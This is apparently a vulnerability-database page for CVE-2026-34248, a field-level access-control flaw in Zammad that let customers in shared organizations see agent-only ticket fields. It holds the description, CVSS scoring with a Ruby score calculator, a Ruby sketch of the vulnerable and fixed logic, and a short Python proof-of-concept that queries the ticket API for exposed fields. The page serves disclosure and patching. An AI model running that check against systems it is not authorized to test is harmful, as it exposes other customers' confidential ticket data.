Security Vulnerability Report
CVE-2026-34248 CVSS 5.7 MEDIUM

CVE-2026-34248

Published: 2026-04-08 19:25:22
Last Modified: 2026-04-17 15:48:48

Description

Zammad is a web-based open source helpdesk/customer support system. Prior to 7.0.1, customers in shared organizations (meaning they can see each other's tickets) could see fields which are not intended for customers, including fields not intended for them at all (e.g. priority, custom ticket attributes for internal purposes). This was the case when a customer opened a ticket from another user of the same shared organization. They are not able to modify these fields. This vulnerability is fixed in 7.0.1.
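The flaw the description reports is field-level, not ticket-level: the check "may this customer read this ticket?" passed correctly for tickets shared within an organization, but the attribute filtering that customers normally get was not applied on that path. The Ruby below is an added illustration written for this page, not Zammad's code. The model names (Organization, User, Ticket, the CUSTOMER_VISIBLE allow-list, the sample users and ticket) are constructed, and the branching in the vulnerable variant is a hypothesis about the shape of the bug reconstructed from the description, not from the patch.

```ruby
# Added illustration for CVE-2026-34248, not Zammad's own code. All names and
# sample data below are constructed for this example.
Organization = Struct.new(:id, :shared)
User         = Struct.new(:id, :organization, :role)   # role: :agent or :customer
Ticket       = Struct.new(:id, :customer_id, :organization_id, :attributes)

# Attributes a customer may ever see (constructed allow-list). Everything
# else, e.g. priority or internal custom attributes, is agent-only.
CUSTOMER_VISIBLE = %w[id title state group].freeze

# Ticket-level access: agents see everything; customers see their own tickets
# and, if their organization is shared, the tickets of other members.
def can_read?(ticket, user)
  return true if user.role == :agent
  return true if ticket.customer_id == user.id
  org = user.organization
  !org.nil? && org.shared && ticket.organization_id == org.id
end

def filter_for_customer(attributes)
  attributes.select { |name, _| CUSTOMER_VISIBLE.include?(name) }
end

# Vulnerable shape (hypothesised from the description): the customer filter is
# applied only on the "own ticket" branch, so a ticket reached through the
# shared-organization branch comes back with every attribute.
def ticket_attributes_vulnerable(ticket, user)
  raise "forbidden" unless can_read?(ticket, user)
  if user.role == :customer && ticket.customer_id == user.id
    return filter_for_customer(ticket.attributes)
  end
  ticket.attributes
end

# Fixed shape: filtering is decided by who is asking, not by how the ticket
# was reached, so every customer-facing path goes through the same allow-list.
def ticket_attributes_fixed(ticket, user)
  raise "forbidden" unless can_read?(ticket, user)
  return ticket.attributes if user.role == :agent
  filter_for_customer(ticket.attributes)
end

# Names of attributes the viewer received that are not on the customer allow-list.
def leaked_attributes(attributes)
  attributes.keys - CUSTOMER_VISIBLE
end

# Constructed sample data: one shared organization with two customers, an
# agent, and a customer from a different, non-shared organization.
SHARED_ORG = Organization.new(1, true)
ALICE    = User.new(10, SHARED_ORG, :customer)
BOB      = User.new(11, SHARED_ORG, :customer)
AGENT    = User.new(1, nil, :agent)
OUTSIDER = User.new(20, Organization.new(2, false), :customer)
ALICES_TICKET = Ticket.new(100, ALICE.id, SHARED_ORG.id, {
  "id" => 100, "title" => "VPN drops every hour", "state" => "open",
  "group" => "Users", "priority" => "3 high", "internal_escalation" => "yes"
})

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable, Bob viewing Alice's ticket: leaks #{leaked_attributes(ticket_attributes_vulnerable(ALICES_TICKET, BOB))}"
  puts "fixed,      Bob viewing Alice's ticket: leaks #{leaked_attributes(ticket_attributes_fixed(ALICES_TICKET, BOB))}"
end
```

The point to take from the fixed variant is that the allow-list is keyed on the viewer's role alone: a customer gets the same projection of an org-mate's ticket as of their own, which is the invariant a regression test for this class of bug should assert.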

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
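The v3.1 vector above can be re-scored locally to confirm the 5.7 on this page. The Ruby below is an added example, not code from the page or from NVD: it implements the CVSS v3.1 base-score equations (metric weights, the Impact and Exploitability sub-scores and the specification's Roundup function) for any v3.1 vector string. It does not handle the CVSS 4.0 metric that the raw JSON at the bottom also carries, which uses a different scoring system.

```ruby
# Added example: CVSS v3.1 base score from a vector string. Weights and the
# Roundup rule follow the CVSS v3.1 specification; this is not NVD tooling.
CVSS31_WEIGHTS = {
  "AV" => { "N" => 0.85, "A" => 0.62, "L" => 0.55, "P" => 0.2 },
  "AC" => { "L" => 0.77, "H" => 0.44 },
  "UI" => { "N" => 0.85, "R" => 0.62 },
  "C"  => { "H" => 0.56, "L" => 0.22, "N" => 0.0 },
  "I"  => { "H" => 0.56, "L" => 0.22, "N" => 0.0 },
  "A"  => { "H" => 0.56, "L" => 0.22, "N" => 0.0 },
}.freeze

# Privileges Required is weighted differently when Scope is Changed.
PR_WEIGHTS = {
  "U" => { "N" => 0.85, "L" => 0.62, "H" => 0.27 },
  "C" => { "N" => 0.85, "L" => 0.68, "H" => 0.5 },
}.freeze

# Spec Roundup: smallest value with one decimal place >= input, done in
# integer arithmetic so floating-point noise cannot change the result.
def cvss31_roundup(x)
  i = (x * 100_000).round
  return i / 100_000.0 if i % 10_000 == 0
  ((i / 10_000) + 1) / 10.0
end

def cvss31_severity(score)
  return "NONE" if score == 0
  return "LOW" if score < 4.0
  return "MEDIUM" if score < 7.0
  return "HIGH" if score < 9.0
  "CRITICAL"
end

def parse_cvss31_vector(vector)
  parts = vector.split("/")
  raise ArgumentError, "not a CVSS v3.1 vector" unless parts.shift == "CVSS:3.1"
  parts.to_h { |p| p.split(":", 2) }
end

# Returns [base_score, severity, impact_subscore, exploitability_subscore],
# the sub-scores rounded to one decimal the way NVD reports them.
def cvss31_base_score(vector)
  m = parse_cvss31_vector(vector)
  changed = m.fetch("S") == "C"

  iss = 1 - (1 - CVSS31_WEIGHTS["C"].fetch(m.fetch("C"))) *
            (1 - CVSS31_WEIGHTS["I"].fetch(m.fetch("I"))) *
            (1 - CVSS31_WEIGHTS["A"].fetch(m.fetch("A")))
  impact = changed ? 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02)**15 : 6.42 * iss

  exploitability = 8.22 *
                   CVSS31_WEIGHTS["AV"].fetch(m.fetch("AV")) *
                   CVSS31_WEIGHTS["AC"].fetch(m.fetch("AC")) *
                   PR_WEIGHTS[changed ? "C" : "U"].fetch(m.fetch("PR")) *
                   CVSS31_WEIGHTS["UI"].fetch(m.fetch("UI"))

  score = if impact <= 0
            0.0
          elsif changed
            cvss31_roundup([1.08 * (impact + exploitability), 10].min)
          else
            cvss31_roundup([impact + exploitability, 10].min)
          end
  [score, cvss31_severity(score), impact.round(1), exploitability.round(1)]
end

if __FILE__ == $PROGRAM_NAME
  vector = "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
  score, severity, impact, expl = cvss31_base_score(vector)
  puts "#{vector} -> #{score} #{severity} (impact #{impact}, exploitability #{expl})"
end
```

Run on this page's vector it returns 5.7 MEDIUM with sub-scores 3.6 and 2.1, matching the impactScore and exploitabilityScore in the raw JSON. The High confidentiality impact (C:H) is what carries the score into MEDIUM; the CVSS 4.0 vector in the same record rates vulnerable-system confidentiality as Low (VC:L), which is the main reason the two assessments disagree.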

Configurations (Affected Products)

cpe:2.3:a:zammad:zammad:7.0.0:*:*:*:*:*:*:* - VULNERABLE
Zammad < 7.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Demonstrates how a tester might verify the vulnerability by fetching a
# ticket through the REST API. Requires valid credentials for a customer in a
# shared organization and the ID of a ticket opened by another member of that
# organization.
TARGET_URL = "https://example.zammad.com/api/v1/tickets/{ticket_id}"
HEADERS = {
    "Authorization": "Bearer <VALID_CUSTOMER_TOKEN>",
    "Content-Type": "application/json",
}

# Fields a customer should not see. Zammad's ticket JSON carries the priority
# as 'priority_id' (and as 'priority' when the request adds expand=true);
# 'internal_note' and 'custom_internal_field' are placeholders for whatever
# internal custom ticket attributes the target instance defines.
SENSITIVE_FIELDS = ["priority", "priority_id", "internal_note", "custom_internal_field"]


def check_info_disclosure(ticket_id):
    """Check whether agent-only fields appear in a customer's ticket response."""
    response = requests.get(
        TARGET_URL.format(ticket_id=ticket_id), headers=HEADERS, timeout=15
    )
    if response.status_code != 200:
        print(f"[!] Request failed with status code: {response.status_code}")
        return
    data = response.json()
    found_fields = [field for field in SENSITIVE_FIELDS if field in data]
    if found_fields:
        print(f"[+] Vulnerability Confirmed! Exposed fields: {found_fields}")
        print(f"[+] Ticket Data: {data}")
    else:
        print("[-] Sensitive fields not exposed in this ticket.")


if __name__ == "__main__":
    # Replace with a Ticket ID from another user in the same shared organization
    check_info_disclosure(123)

References

https://github.com/zammad/zammad/security/advisories/GHSA-prww-84vh-w978 (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34248", "sourceIdentifier": "[email protected]", "published": "2026-04-08T19:25:21.567", "lastModified": "2026-04-17T15:48:48.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1, customers in shared organizations (means they can see each other's tickets) could see fields which are not intended for customers - including fields not intended for them at all (e.g. priority, custom ticket attributes for internal purposes). This was the case when a customer opened a ticket from another user of the same shared organization. They are not able to modify these field. This vulnerability is fixed in 7.0.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zammad:zammad:7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "830AF7C5-9441-4C80-935E-C53BDB097BB1"}]}]}], "references": [{"url": "https://github.com/zammad/zammad/security/advisories/GHSA-prww-84vh-w978", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}